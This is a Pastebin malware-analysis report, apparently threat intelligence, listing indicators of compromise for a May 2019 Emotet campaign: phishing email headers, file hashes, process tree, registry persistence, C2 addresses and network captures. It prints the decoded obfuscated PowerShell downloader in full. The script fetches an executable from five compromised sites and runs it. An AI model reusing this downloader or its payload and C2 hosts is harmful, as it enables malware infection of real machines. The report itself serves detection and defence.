API tools faq
paste
Advertisement
VRad

#emotet_150519

VRad
May 16th, 2019
1,269
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.59 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
  2.  
  3. https://pastebin.com/F520pqQW
  4.  
  5. previous_contact:
  6. 28/01/19 https://pastebin.com/z2TDfM7s
  7. 23/01/18 https://pastebin.com/D9TDts5J
  8. 20/12/18 https://pastebin.com/EejcbL4t
  9. 04/12/18 https://pastebin.com/znQDtbnt
  10. 09/11/18 https://pastebin.com/THHMs2wg
  11. 01/10/18 https://pastebin.com/Y6DnbpHv
  12.  
  13. FAQ:
  14.  
  15. attack_vector
  16. --------------
  17. email attach .doc > macro > WMI > powershell -enc > GET 5 URL > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\?\?.exe
  18.  
  19. email_headers
  20. --------------
  21. Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
  22. Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
  23. Date: Wed, 15 May 2019 17:00:50 -0500
  24. From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
  25. To: <user00@victim01>
  26. Subject: RE: RE: Ціновий запит_комплектація для санвузла
  27.  
  28. files
  29. --------------
  30. SHA-256 e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
  31. File name DATA-916228-2122097647.doc [Composite Document File V2 Document, Application: Microsoft Office Word]
  32. File size 145.13 KB (148608 bytes)
  33.  
  34. SHA-256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
  35. File name l4gktj_307970247.exe [PE32 executable (GUI) Intel 80386, for MS Windows] .!..L.!This program cannot be run in DOS mode.
  36. File size 75 KB (76800 bytes)
  37.  
  38. activity
  39. **************
  40. macro_ps_b64_decoded:
  41. --------------
  42. $d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
  43.  
  44. PL_SCR 5 / 5
  45. --------------
  46. http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
  47. http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
  48. https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
  49. http://adsprout[.] co/wp/oMrTbPUxE/
  50. http://springhelp[.] co[.] za/wp/jMSZNshHRf/
  51.  
  52. C2
  53. --------------
  54. 78.188.7.213:8090
  55. 138.68.13.161:8080
  56.  
  57. netwrk
  58. --------------
  59. 37.9.175.14 tomasoleksak{.} com GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1 no User Agent (!)
  60. 78.188.7.213 78.188.7.213:8090 POST /health/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
  61. 138.68.13.161 138.68.13.161:8080 POST /loadan/enable/stubs/merge/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
  62.  
  63. comp
  64. --------------
  65. powershell.exe 2632 TCP localhost 49539 37.9.175.14 80 ESTABLISHED
  66. eventssmall.exe 2108 TCP localhost 49540 90.57.69.215 80 SYN_SENT
  67. eventssmall.exe 2108 TCP localhost 49542 191.92.69.115 80 SYN_SENT
  68. eventssmall.exe 2108 TCP localhost 49544 75.177.169.225 80 SYN_SENT
  69. eventssmall.exe 2108 TCP localhost 49546 78.188.7.213 8090 ESTABLISHED
  70. eventssmall.exe 2108 TCP localhost 49547 207.44.45.27 22 SYN_SENT
  71. eventssmall.exe 2108 TCP localhost 49548 138.68.13.161 8080 ESTABLISHED
  72.  
  73. proc
  74. --------------
  75. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  76. ... [another context]
  77. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  78. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
  79. C:\Users\operator\206.exe
  80. C:\Users\operator\206.exe --d4ba2bdd
  81. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
  82. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3
  83.  
  84. persist
  85. --------------
  86. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 16.05.2019 11:08
  87. eventssmall
  88. c:\users\operator\appdata\local\eventssmall\eventssmall.exe 03.09.2012 12:06
  89.  
  90. drop
  91. --------------
  92. %temp%\VBE\
  93. %temp%\Word8.0\MSForms.exd
  94. C:\Users\operator\206.exe [removed]
  95. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
  96.  
  97. # # #
  98.  
  99. https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
  100. https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
  101. https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef
  102.  
  103. VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!